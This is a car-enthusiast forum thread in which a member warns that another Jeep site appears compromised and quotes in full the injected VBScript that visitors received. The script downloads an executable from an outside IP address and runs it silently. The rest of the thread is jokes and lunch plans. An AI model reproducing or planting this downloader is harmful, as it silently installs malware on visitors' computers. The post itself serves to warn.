• NAXJA is having its 18th annual March Membership Drive!!!
    Everyone who joins or renews during March will be entered into a drawing!
    More Information - Join/Renew
  • Welcome to the new NAXJA Forum! If your password does not work, please use "Forgot your password?" link on the log-in page. Please feel free to reach out to [email protected] if we can provide any assistance.

Warning: Worm/Trojan/Virus at JeepsUnlimited.com

Glenn B

Member #69
NAXJA Member
Just a heads up for those that "might" visit JU.

Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.

I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.

The issue seems to be either a worm or trojan downloader.
  • This is part of the code in the file:
  • a.open "GET", "http://209.200.229.100/~richar8/d.exe",0
So JU is likely compromised and is pulling that .exe file from another server client account that is likely compromised.

The file loaded to your PC contains the following code:
(Do NOT try to load the code)
<script language="VBScript">
On Error Resume Next
a=location.href
done = 0
set d = document.createelement("object")
d.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
set a = d.createobject("Microsoft.XMLHTTP","")
set e = d.createobject("Scripting.FileSystemObject","")
set g = d.createobject("Adodb.Stream","")
for i = 0 to 5
if i = 0 then x = "c:\windows\temp" else if i = 1 then x = "c:\temp" else if i = 2 then x = "c:\tmp" else if i = 3 then x = "c:\winnt\temp" else if i = 4 then x = "c:\" end if
h = e.buildpath(x,"\d.exe")
g.type = 1
a.open "GET", "http://209.200.229.100/~richar8/d.exe",0
a.send
g.open
g.write a.responsebody
g.savetofile h,2
g.close
if err.number <> 0 then
Err.Clear
else
set i = d.createobject("shell.application","")
i.shellexecute h,"","","open",0
exit for
End if
next
</script>
 
Would this be considered a form of darwinism?
 
Ramsey said:
Would this be considered a form of darwinism?

I was just sorely tempted to put a link in but luckily it was only momentary and I resisted...
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
 
RichP said:
I was just sorely tempted to put a link in but luckily it was only momentary and I resisted...
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.
 
RichP said:
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
Hoboken Hobo said:
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.

I makes my heart warm, when I see romance blossoming.
Good Luck Fellas. :thumbup:

:D
 
OT said:
Don't go there, or you'll be stupid.

:roflmao: :roflmao: :roflmao:
 
Hoboken Hobo said:
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.
we here want pics to guys...
2iid155.jpg
 
qu'est ce que c'est? parlez-vous anglais?

Como? Habla-ingles?
 
Hoboken Hobo said:
Just a heads up for those that "might" visit JU.

Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.

I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.

Jason has been on vaction for the last 2 days, he will be back in the office on monday. I'm sure he'll check the site sometime in the next day or so, but it might take him some time to get your PM.

I'll let him know whats up if I talk to him tomorow.
 
RalphXJ said:
Jason has been on vaction for the last 2 days, he will be back in the office on monday. I'm sure he'll check the site sometime in the next day or so, but it might take him some time to get your PM.

I'll let him know whats up if I talk to him tomorow.


It's JU, if it took 3 years, the majority of us would never know(or care)
:D
 
Back
Top